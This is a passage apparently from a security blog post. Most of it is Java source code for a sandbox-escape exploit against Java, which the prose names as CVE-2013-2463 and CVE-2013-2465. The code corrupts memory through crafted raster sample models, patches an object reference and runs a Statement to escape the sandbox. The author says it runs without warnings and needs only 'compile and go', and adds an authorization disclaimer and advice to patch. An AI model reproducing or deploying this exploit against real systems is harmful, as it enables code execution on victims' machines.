      WritableRaster localWritableRaster1 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel1, localDataBufferByte2, null);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel2 = 
            new MultiPixelPackedSampleModel(0, 4, 2, 1, 
            1073741789 - (this._is64 ? 16 : 0), 288 + (this._is64 ? 128 : 0));
      WritableRaster localWritableRaster2 = Raster.createWritableRaster(
            localMultiPixelPackedSampleModel2, localDataBufferByte1, null);
      byte[] arrayOfByte = { 0, -1 };
      IndexColorModel localIndexColorModel = new IndexColorModel(1, 2, 
            arrayOfByte, arrayOfByte, arrayOfByte);
      CompositeContext localCompositeContext = 
            AlphaComposite.Src.createContext(
            localIndexColorModel, localIndexColorModel, null);
      localCompositeContext.compose(localWritableRaster1, 
            localWritableRaster2, localWritableRaster2);
      int k = arrayOfInt.length;
      if (k == i)
        return 1;
      int m = 0;
      int n = arrayOfObject2.length;
      for (int i1 = i + 2; i1 < i + 32; i1++)
        if ((arrayOfInt[(i1 - 1)] == n) 
            && (arrayOfInt[i1] == 0) 
            && (arrayOfInt[(i1 + 1)] == 0) 
            && (arrayOfInt[(i1 + 2)] != 0) 
            && (arrayOfInt[(i1 + 3)] != 0) 
            && (arrayOfInt[(i1 + 4)] != 0) 
            && (arrayOfInt[(i1 + 5)] == 0) 
            && (arrayOfInt[(i1 + 6)] == 0))
        {
          int i2 = arrayOfInt[(i1 + 4)];
          for (int i3 = i1 + 7; i3 < i1 + 7 + 64; i3++)
            if (arrayOfInt[i3] == i2)
            {
              arrayOfInt[(i3 - 1)] = arrayOfInt[(i1 + 3)];
              m = 1;
              break;
            }
          if (m != 0)
            break;
        }
      if (m != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  public static Class getSystemClass()
  {
    return System.class;
  }
}

The behavior of CVE-2013-2463 appears to be the same as CVE-2013-2465. Neither triggers a click-to-run Java warning; they both just run, exploit, and pop up calc.exe with no problems.

In any case, some fairly simple source code for these exploits is above, and no special byte code alterations are needed like last time, just compile and go.

As always, again:

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

And if you run Java… just uninstall or at least patch…